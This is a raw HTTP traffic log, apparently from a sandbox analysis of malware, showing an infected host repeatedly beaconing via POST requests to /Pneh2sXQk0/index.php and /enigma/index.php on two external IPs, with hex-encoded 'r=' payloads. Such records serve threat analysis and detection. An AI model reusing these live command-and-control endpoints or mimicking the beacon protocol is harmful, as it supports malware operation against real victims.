                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:48.559319973 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1269 | 192.168.2.5 | 51123 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:48.533718109 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:48.789422035 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1270 | 192.168.2.5 | 51124 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:48.817939043 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:49.074604988 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1271 | 192.168.2.5 | 51125 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:49.152014017 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:49.400629997 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1272 | 192.168.2.5 | 51126 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:49.415174961 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:49.659615993 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1273 | 192.168.2.5 | 51127 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:49.655024052 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:49.904206991 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1274 | 192.168.2.5 | 51128 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:49.915750980 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:50.168057919 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1275 | 192.168.2.5 | 51129 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:50.264131069 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:50.516494989 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1276        192.168.2.5  51130        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:50.508085012 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:50.752542973 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1277        192.168.2.5  51131        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:50.765695095 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:51.014405012 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1278        192.168.2.5  51132        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:51.001929045 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:51.250554085 CEST  196                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1279        192.168.2.5  51133        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:51.366453886 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:51.610553980 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1280        192.168.2.5  51134        193.233.132.56   80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:51.589031935 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:51.833916903 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1281        192.168.2.5  51135        193.233.132.167  80
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:35:51.864643097 CEST  309                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:52.116436958 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1282 | 192.168.2.5 | 51136 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:52.090903044 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:52.346362114 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1283 | 192.168.2.5 | 51137 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:52.463251114 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:52.712085009 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1284 | 192.168.2.5 | 51138 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:52.685513973 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:52.937618017 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1285 | 192.168.2.5 | 51139 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:52.964256048 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:53.215853930 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1286 | 192.168.2.5 | 51140 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:53.198038101 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:53.457808971 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1287 | 192.168.2.5 | 51141 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:53.325068951 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:53.568650961 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1288 | 192.168.2.5 | 51142 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:53.811758995 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:54.063719034 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1289 | 192.168.2.5 | 51143 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:53.822442055 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
